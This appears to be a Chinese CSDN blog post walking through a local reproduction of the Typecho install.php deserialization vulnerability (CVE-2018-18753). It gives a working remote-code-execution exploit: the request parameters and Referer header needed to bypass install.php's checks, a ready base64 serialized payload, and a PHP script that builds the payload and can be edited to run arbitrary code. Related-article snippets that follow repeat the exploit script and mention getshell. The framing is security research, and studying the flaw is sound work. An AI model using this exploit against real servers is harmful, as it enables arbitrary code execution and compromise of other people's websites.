typecho反序列化漏洞原理及复现过程

最新推荐文章于 2025-02-20 20:08:32 发布
最新推荐文章于 2025-02-20 20:08:32 发布
阅读量1.7k 收藏 2
点赞数 6
CC 4.0 BY-SA版权
分类专栏: 渗透测试(web渗透)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wsnbbz/article/details/104653066
本文详细解析了Typecho博客程序中存在的一种反序列化漏洞,该漏洞源于对特定参数的不当处理,允许攻击者通过构造恶意请求,绕过正常验证流程,执行任意代码。文章提供了漏洞利用的具体步骤及示例代码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞介绍
Typecho是一个简单,轻巧的博客程序。基于PHP,使用多种数据库(Mysql,PostgreSQL,SQLite)储存数据。在GPL Version 2许可证下发行,是一个开源的程序,目前使用SVN来做版本管理
漏洞形成
由于源码的以下几行存在反序列化漏洞与逻辑绕过,形成漏洞
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
漏洞利用
思路:
由于install.php代码验证了finish参数,请求头HTTP_HOST,post数据__typecho_config,所以我们要加上这几个参数进行绕过
1.添加install.php?finish参数
http://localhost/typecho/install.php?finish=1
2.添加Referrer数据头为本地
http://localhost
3.添加post值__typecho_config=脚本运行得到的攻击代码
代码:

YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=

脚本源码:

<?php
class Typecho_Feed
{
    const RSS1 = 'RSS 1.0';
    const RSS2 = 'RSS 2.0';
    const ATOM1 = 'ATOM 1.0';
    const DATE_RFC822 = 'r';
    const DATE_W3CDTF = 'c';
    const EOL = "\n";
    private $_type;
    private $_items;

    public function __construct(){
        $this->_type = $this::RSS2;
        $this->_items[0] = array(
            'title' => '1',
            'link' => '1',
            'date' => 1508895132,
            'category' => array(new Typecho_Request()),
            'author' => new Typecho_Request(),
        );
    }
}
class Typecho_Request
{
    private $_params = array();
    private $_filter = array();

    public function __construct(){
        $this->_params['screenName'] = 'phpinfo()';
        $this->_filter[0] = 'assert';
    }
}
$exp = array(
    'adapter' => new Typecho_Feed(),
    'prefix' => 'typecho_'
);
echo base64_encode(serialize($exp));

之后在脚本里phpinfo()处替换代码即可生成对应注入语句
4.输入后效果
在这里插入图片描述
5.执行后效果:phpinfo被打印
在这里插入图片描述

typecho反序列化漏洞复现
weixin_44005410的博客
05-21 2049
0x01前言 再杭州西湖线下打AWD的时候web1就是这个漏洞,在这里复现一下,刚好巩固一下前几天学习的反序列化漏洞。 0x02漏洞分析 这是一个由unserialize()导致的一个反序列化漏洞,全局搜索unserialize(),在install.php的232行发现 <?php $config = unserialize(base64_decode(Typecho_Cookie::...
Typecho代码审计-反序列化漏洞复现(超详细!!!)
小小小屿屿屿的博客
12-27 3521
本文以Typecho为靶场,通过代码审计,复现反序列化漏洞
记一次typecho反序列化漏洞复现(第一次写poc版)
m0_62100902的博客
06-28 2500
经过一系列的代码审计,终于找到一个可以利用的点,其余的属性全都是写死了的,也就是静态this的调用方式,而这里不是静态的,它可以是别的对象里面去调用这个属性,那么我们可以想到一种魔术方法:__get(),这个魔术方法是当对象中调用不存在的属性时候会自动去调用这个魔术方法,那么我们需要去找到一个既有__get()魔术方法的又没有screenName这个属性的对象(这里终于来点感觉了),继续在代码审计工具里面找__get()说一说我的个人理解吧。举个例子,php与java之间是如何相互传输的呢?
CVE-2018-18753 Typecho 反序列化漏洞 分析复现
2301_77512689的博客
04-21 614
漏洞概述:typecho 是一款非常简洁快速博客 CMS,前台 install.php 文件存在反序列化漏洞,通过构造的反序列化字符串注入可以执行任意 PHP 代码。影响版本:typecho1.0(14.10.10)
漏洞复现篇——Typecho反序列化漏洞
爱国小白帽
03-03 5322
实验环境: PHPstudy 火狐浏览器 Typecho 填好数据库密码和你的登录密码就可以了 安装时会报错,因为无法自动创建数据库,需要使用CREATE DATABASE typecho default charset utf8;语句手动创建数据库 ...
深入解析PHP反序列化漏洞原理、利用与防护
xinyaoyaotu的博客
02-20 1775
在PHP中,序列化(Serialization)是将对象或数据结构转换为字符串的过程,以便于存储或传输。反序列化(Deserialization)则是将字符串还原为对象或数据结构的过程。// 序列化// 输出:a:2:{s:4:"name";s:3:"age";i:25;// 反序列化// 输出:Array ( [name] => Alice [age] => 25 )PHP反序列化漏洞因其高危害性和隐蔽性,成为Web应用安全中的一大威胁。
Typecho反序列化导致前台 getshell 漏洞复现
weixin_30483697的博客
10-31 448
Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛。这次的漏洞通过install.php安装程序页面的反序列化函数,造成了命令执行。 影响范围:理论上这个漏洞影响Typecho 1.1(15.5.12)之前的版本 首先我还是记录一下敏感目录 http://127.0.0.1/typecho0....
typechov漏洞.zip
08-10
typecho框架漏洞-php反序列化任意代码执行,附加poc-exp,适合理解序列化漏洞
Typecho框架漏洞
weixin_62693307的博客
11-19 653
这里说的漏洞是xss漏洞,学过渗透的应该都学过,我在这里就不过多阐述了,下面我们直接进入正题。然后再次访问时即可弹出一个框,这里学过xss漏洞的应该知道是什么意思了。这里说的框架漏洞只适用于1.2.0版本及以下的版本。然后等管理员访问评论是会使得js文件也给运行起来。然后这里就像上面反弹xss代码一样书写网址。生成的一句话目录路径可以自己改,上面的如下。在404.php中,这样路径的问题就解决了。这样我们就可以用蚁剑或其他工具连接后台了。
Typecho重大漏洞
qq_43676541的博客
04-15 479
#简介 Typecho是一个基于PHP的博客软件。Typecho是在GNU通用公共许可证2.0下发布的。 Typecho在1.1版本中存在反序列化漏洞,当系统未安装的情况下,攻击者可以利用ins
TypechoCMS反序列化漏洞(CVE-2018-18753)
m0_57379855的博客
03-12 1449
TypechoCMS反序列化漏洞(CVE-2018-18753Typecho反序列化漏洞php-pocpython-poc Typecho反序列化漏洞 PHP版本:5.4.5nts(PHPStudy) 在数据库新建一个数据库typecho 只要传一个不存在的成员变量,就会触发_get()魔法函数 使用_get()调用applyFilter() call_user_func() 可以执行任意命令,包括写入文件 php-poc python-poc 重点函数 ...
Typecho CMS 反序列化漏洞(CVE-2018-18753)复现
2301_80661529的博客
03-16 750
安装:创建数据库typecho再进入安装程序,输入数据库密码,设置登录密码即可直接使用即可。
typecho反序列化漏洞
cxrpty的博客
03-02 800
Typecho是一个简单,轻巧的博客程序。基于PHP,使用多种数据库(Mysql,PostgreSQL,SQLite)储存数据。在GPL Version 2许可证下发行,是一个开源的程序,目前使用SVN来做版本管理。 实验环境:php5.4 实验步骤: 1.漏洞形成的原因 2.由于对finish参数、请求头HTTP_HOST及post_typecho_config数据进行验证,所以...
16-PHP代码审计——Typecho1.0.14反序列化漏洞
网络安全
05-26 1305
漏洞受影响版本: Typecho_v1.0.14以下 环境: php5以上 Typecho_v1.0.14.tar poc: __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1O
CVE-2018-18753 Typecho 漏洞复现分析
OceanSJ的博客
02-17 695
找到unserialize()函数;验证_typecho_config参数可控;追踪对象$db发现了Magic方法并跟踪至敏感函数call_user_func()
typecho反序列化漏洞(详细过程
qq_61991235的博客
03-13 1907
typecho反序列化 菜鸡的第一条链子,酌情参考 搭建环境 利用phpstudy+phpstrom搭建环境调试(注意php版本大于5.4) 开始 漏洞起始点 前提:get方法传?finish=1,refer=http://127.0.0.1 若不设置的话exit,程序结束 详细看install.php前面部分的代码 <?php $config = unserialize(base64_decode(Typecho_Cookie::get('__typecho
typecho1.1 反序列化漏洞
最新发布
06-27
Typecho 1.1 版本中的反序列化漏洞主要涉及的是 CVE-2018-18753,该漏洞源于系统在处理用户输入时未能正确验证反序列化的数据,导致攻击者可能通过构造恶意请求执行任意代码。 ### 漏洞原理 漏洞的核心在于 Typecho CMS 在 `install.php` 文件中对 `__typecho_config` cookie 值进行反序列化操作时,未正确校验其内容。由于 `__typecho_config` 是可控的(通过 Cookie 修改),攻击者可以注入特定的序列化字符串来触发反序列化漏洞。在 PHP 中,反序列化操作会调用对象的魔法函数(如 `__construct()`、`__destruct()` 等),从而可能导致任意代码执行 [^3]。 ### POC(Proof of Concept) 以下是针对此漏洞的一个典型 PoC 示例: ```php <?php class Typecho_Feed { const RSS1 = 'RSS 1.0'; const RSS2 = 'RSS 2.0'; const ATOM1 = 'ATOM 1.0'; const DATE_RFC822 = 'r'; const DATE_W3CDTF = 'c'; const EOL = "\n"; private $_type; private $_items; public function __construct() { $this->_type = $this::RSS2; $this->_items[0] = array( 'title' => '1', 'link' => '1', 'date' => 1508895132, 'category' => array(new Typecho_Request()), 'author' => new Typecho_Request(), ); } } class Typecho_Request { private $_params = array(); private $_filter = array(); public function __construct() { $this->_params['screenName'] = 'phpinfo()'; // 这里可以替换为其他命令执行函数,例如 `system('id')` $this->_filter[0] = 'assert'; } } $exp = array( 'adapter' => new Typecho_Feed(), 'prefix' => 'typecho_' ); echo base64_encode(serialize($exp)); ?> ``` 该 PoC 利用了 `Typecho_Feed` 和 `Typecho_Request` 类的构造方法,在反序列化时触发 `assert` 函数并执行任意代码(如 `phpinfo()`)[^2]。 ### 安全修复建议 为了防止此类漏洞的发生,Typecho 团队在后续版本中采取了以下安全措施: 1. **输入过滤与验证**:加强了对用户输入的验证机制,尤其是对于从 Cookie 获取的数据进行了更严格的过滤。 2. **移除不安全的反序列化逻辑**:优化了配置信息的存储方式,避免直接使用反序列化处理用户提供的数据 [^3]。 3. **更新补丁**:官方推荐所有使用受影响版本的用户尽快升级到最新稳定版(1.1 或更高版本),以确保系统的安全性。 ### 安全最佳实践 - **最小权限原则**:Web 应用应运行在最小权限下,避免攻击者利用漏洞后获取高权限。 - **定期更新依赖库**:确保所使用的第三方组件和框架保持最新状态,及时应用安全补丁。 - **启用 Web 应用防火墙 (WAF)**:通过 WAF 可以检测并拦截恶意请求,减少被攻击的风险。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值